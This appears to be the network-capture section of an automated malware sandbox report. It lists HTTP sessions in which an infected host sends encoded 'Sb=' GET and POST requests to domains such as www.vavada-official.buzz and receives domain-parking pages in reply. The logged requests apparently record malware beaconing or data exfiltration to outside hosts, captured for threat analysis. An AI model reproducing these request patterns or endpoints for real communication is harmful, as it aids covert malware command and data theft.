                                                                                        Data Ascii: Sb=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPmkjbc1h4MTwiMTt8w2omoqel/mYOdRIJ6bko8APW8mt+GaZtuyRejimJbXl28T5gM1iQcl27h1Uw2qf1V3C+8tZKNz5KDe70jxCEuaROASF3h61M4CQeU+JhOe11U4Mfl5R3Y0ppVvMPKFiuu8rk5jM6yf/El7zLQShedjQZVZ4UwZVJPKSoF9eEyxQO7OfpvwKa0CqiX6SRya4fnBpDnXR9Fk++2JlbVsLYiKk7/TRDvilZvIaluprkgs+ns+12MWGvq2gvqicY0A79P8HPDW0UjtlsEWVbaDclnuG2JdKtypTWrGg2yea7IqHTrhJSRO6zR9O2WSjKT2WDY9+0Dtedp8ewJh7hPMJPkBBHl/MeGj847grrf2FRsUFv+tmp0uiZ4CmG3XtUxMQ7KEHCkE+Xw2UYgmfycbr9n6LGd+hxzY6oeSr8DJ2I/zvV7Cq2evrHWRJimgxu+hI7o7bHVTPfVMF8vdSmiogd6zX7i/k6HPBrmCaXoBS2RYAae3ILGKqOpToozz79BpVjj4+eK9ZkJzm66S5Y9evekL+wzl4xie9dsSS1LLtUUJXiUdrl5Ilf/fteKodhNBagfxtFmlGdmFKYscjx1kxKZ0V2DNRc0uR+2T5H81Ec+NhXVncZeT6m89aCa0RZh0S7qDLHbR0nYupCtQ8EDrjtG7JUda/kf5xGDQ9Zq4nvQL8cdr1VmDXi5K6J63T5C8XnTo8oiHhUA4KhW8UYHNzljMZT+4NuLoCqvJl0r/NfTQLKS0vliO9rKDYQos8azS1K+djfX+L9l4VLMAvhONMUO
                                                                                        Dec 12, 2024 21:58:16.314774036 CET5156OUTData Raw: 6c 61 43 65 47 53 51 31 39 42 75 4b 47 31 51 5a 66 61 66 63 7a 6e 37 73 73 53 63 6d 61 4f 71 4d 73 68 77 53 69 75 58 31 43 6f 38 79 53 72 69 74 5a 66 36 79 4a 70 4b 77 55 75 67 72 6a 53 63 69 4e 34 58 38 78 52 56 2b 33 68 69 42 51 7a 78 56 53 4d
                                                                                        Data Ascii: laCeGSQ19BuKG1QZfafczn7ssScmaOqMshwSiuX1Co8ySritZf6yJpKwUugrjSciN4X8xRV+3hiBQzxVSMe2GShyxeq24YnQZk6IqQRUSZdU1im2AW+SPxxz0yKJK5WcMeT/q+FAGpSZ9tTGLakZZD335fxF1LWcDa1ltKHDdfPFVCs6N8PHVuUXtAnKzaTxHsjCNu2gss9rQIIxbvFpUWq2FxR/nSsjd2lgMoek3VMLMHrU6z6
                                                                                        Dec 12, 2024 21:58:16.314820051 CET1289OUTData Raw: 69 6b 32 2f 52 70 72 68 50 74 69 75 46 4d 2b 54 79 33 55 50 76 51 71 4f 6d 63 31 64 65 47 38 51 55 32 37 4e 79 69 61 38 6a 48 54 4f 78 6c 69 54 32 31 66 6b 30 72 77 39 38 37 6b 39 6d 48 72 4f 5a 4c 61 34 62 52 4b 45 6a 50 66 4f 31 4a 2f 62 4c 6b
                                                                                        Data Ascii: ik2/RprhPtiuFM+Ty3UPvQqOmc1deG8QU27Nyia8jHTOxliT21fk0rw987k9mHrOZLa4bRKEjPfO1J/bLkve0wTEwcBI+bVerk+Cc49ITQZTUF8tq/rsH3mekal3csvAT9Vcl8vyntQNjztBrZz4hgWtZW805OBgiBfcEllkhWP0a7PA8/sI7qsaYC+82+2Nto3E6/xZi46rRc18EuGacYz9Ru6jvYW9cwpFWPsGNjQutTVYsII
                                                                                        Dec 12, 2024 21:58:16.314994097 CET73OUTData Raw: 37 2f 6b 52 41 59 64 6a 69 42 45 47 38 65 41 63 30 30 45 7a 6a 65 44 2b 42 45 55 4c 66 35 36 64 38 62 37 74 77 52 4a 32 58 64 6b 6e 4c 42 4f 78 6a 5a 44 54 4c 33 6d 79 55 65 2b 6d 66 4c 45 6c 66 6e 34 48 6b 6e 41 3d 3d
                                                                                        Data Ascii: 7/kRAYdjiBEG8eAc00EzjeD+BEULf56d8b7twRJ2XdknLBOxjZDTL3myUe+mfLElfn4HknA==
                                                                                        Dec 12, 2024 21:58:16.547846079 CET1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:58:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        Dec 12, 2024 21:58:16.547859907 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        Dec 12, 2024 21:58:16.548079014 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        Dec 12, 2024 21:58:16.548091888 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        Dec 12, 2024 21:58:16.548099995 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        Dec 12, 2024 21:58:16.548108101 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        61192.168.11.2049776194.9.94.8680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:19.066488981 CET380OUTGET /2j93/?Hsa=KVXAK1dJ22EyzD&Sb=Vzef3oWXaGELtgURWqqFi05KJy99TvY3Ax3n2w42PW1Tdv5T/46T0veVyj66+7X9h8HGTeoaGJDhn+MaRcWt91HqjtPUKRqQAZTb/tezorVLLvQhzmVaw3M= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:58:19.299500942 CET1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:58:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        Dec 12, 2024 21:58:19.299510956 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        Dec 12, 2024 21:58:19.299706936 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        Dec 12, 2024 21:58:19.299765110 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        Dec 12, 2024 21:58:19.299772024 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        Dec 12, 2024 21:58:19.299777985 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        62192.168.11.2049777199.59.243.22780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:24.457531929 CET668OUTPOST /emhd/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        Origin: http://www.vavada-official.buzz
                                                                                        Referer: http://www.vavada-official.buzz/emhd/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 56 31 59 4e 66 2f 73 62 43 37 53 47 74 63 61 76 31 48 5a 46 35 57 6f 2b 71 62 59 4e 58 7a 49 2b 6a 72 77 76 72 67 4d 2b 4c 4a 6b 53 2b 6a 61 56 71 78 68 63 6c 53 34 6e 7a 7a 75 45 61 75 49 45 41 62 50 4c 5a 46 6d 54 61 48 5a 33 6c 78 52 71 71 52 71 47 50 38 61 33 44 39 38 6e 57 54 53 39 6f 56 67 4d 48 70 42 72 32 2b 70 37 46 63 2b 74 59 6b 38 55 78 55 55 7a 51 6e 42 32 66 41 4b 63 63 68 43 37 75 77 61 73 32 6c 67 4c 54 31 78 2b 68 6a 62 77 51 57 4d 6c 39 38 47 32 4d 47 44 38 42 49 57 44 62 4a 2b 68 2f 64 4e 78 4d 48 6e 4a 7a 57 37 52 6f 6f 38 39 51 32 35 59 4c 34 6b 75 72 51 3d 3d
                                                                                        Data Ascii: Sb=V1YNf/sbC7SGtcav1HZF5Wo+qbYNXzI+jrwvrgM+LJkS+jaVqxhclS4nzzuEauIEAbPLZFmTaHZ3lxRqqRqGP8a3D98nWTS9oVgMHpBr2+p7Fc+tYk8UxUUzQnB2fAKcchC7uwas2lgLT1x+hjbwQWMl98G2MGD8BIWDbJ+h/dNxMHnJzW7Roo89Q25YL4kurQ==
                                                                                        Dec 12, 2024 21:58:24.589164019 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:58:23 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: ec773953-24c7-4ba9-9360-c00964044290
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=ec773953-24c7-4ba9-9360-c00964044290; expires=Thu, 12 Dec 2024 21:13:24 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6c 47 55 39 6c 72 4c 66 54 43 43 4c 41 47 6f 42 61 75 45 6a 6a 79 76 4f 70 50 75 76 5a 51 4a 33 57 58 57 67 48 6b 37 31 72 4b 38 77 59 52 50 4c 7a 35 77 76 4f 54 61 56 54 2b 57 2b 46 59 62 4b 36 49 37 70 64 58 67 35 45 7a 6d 52 36 63 69 69 39 73 66 49 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:58:24.589174986 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWM3NzM5NTMtMjRjNy00YmE5LTkzNjAtYzAwOTY0MDQ0MjkwIiwicGFnZV90aW1lIjoxNzM0MDM3MTA0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        63192.168.11.2049778199.59.243.22780
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:27.124417067 CET688OUTPOST /emhd/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.vavada-official.buzz
                                                                                        Origin: http://www.vavada-official.buzz
                                                                                        Referer: http://www.vavada-official.buzz/emhd/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 56 31 59 4e 66 2f 73 62 43 37 53 47 72 39 71 76 32 67 4e 46 31 6d 6f 39 6d 37 59 4e 4f 6a 49 36 6a 72 4d 76 72 68 34 55 4c 62 41 53 2b 43 71 56 70 30 42 63 6b 53 34 6e 72 44 75 46 65 75 49 78 41 62 7a 44 5a 46 71 54 61 48 4e 33 6c 77 68 71 71 6d 2b 5a 50 73 61 78 4c 64 38 6c 4c 44 53 39 6f 56 67 4d 48 70 56 42 32 2b 42 37 46 76 32 74 59 46 39 6d 76 45 55 77 54 6e 42 32 62 41 4b 59 63 68 44 75 75 78 47 43 32 6e 59 4c 54 31 68 2b 68 33 48 2f 66 57 4d 72 35 38 48 31 4c 57 57 76 61 38 7a 33 49 70 2b 66 2b 73 31 79 4a 52 71 54 75 6b 50 31 72 37 67 50 55 47 41 77 4a 36 6c 31 32 52 57 35 37 62 5a 74 6a 72 66 63 45 77 77 4e 45 5a 44 6d 70 31 59 3d
                                                                                        Data Ascii: Sb=V1YNf/sbC7SGr9qv2gNF1mo9m7YNOjI6jrMvrh4ULbAS+CqVp0BckS4nrDuFeuIxAbzDZFqTaHN3lwhqqm+ZPsaxLd8lLDS9oVgMHpVB2+B7Fv2tYF9mvEUwTnB2bAKYchDuuxGC2nYLT1h+h3H/fWMr58H1LWWva8z3Ip+f+s1yJRqTukP1r7gPUGAwJ6l12RW57bZtjrfcEwwNEZDmp1Y=
                                                                                        Dec 12, 2024 21:58:27.255738020 CET1289INHTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:58:26 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1150
                                                                                        x-request-id: 103ede2e-49f5-4c34-914a-2e7941c9519c
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==
                                                                                        set-cookie: parking_session=103ede2e-49f5-4c34-914a-2e7941c9519c; expires=Thu, 12 Dec 2024 21:13:27 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 6c 47 55 39 6c 72 4c 66 54 43 43 4c 41 47 6f 42 61 75 45 6a 6a 79 76 4f 70 50 75 76 5a 51 4a 33 57 58 57 67 48 6b 37 31 72 4b 38 77 59 52 50 4c 7a 35 77 76 4f 54 61 56 54 2b 57 2b 46 59 62 4b 36 49 37 70 64 58 67 35 45 7a 6d 52 36 63 69 69 39 73 66 49 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_klGU9lrLfTCCLAGoBauEjjyvOpPuvZQJ3WXWgHk71rK8wYRPLz5wvOTaVT+W+FYbK6I7pdXg5EzmR6cii9sfIw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:58:27.256031036 CET550INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTAzZWRlMmUtNDlmNS00YzM0LTkxNGEtMmU3OTQxYzk1MTljIiwicGFnZV90aW1lIjoxNzM0MDM3MTA3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cudmF2YWRhLW9mZmljaWF


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
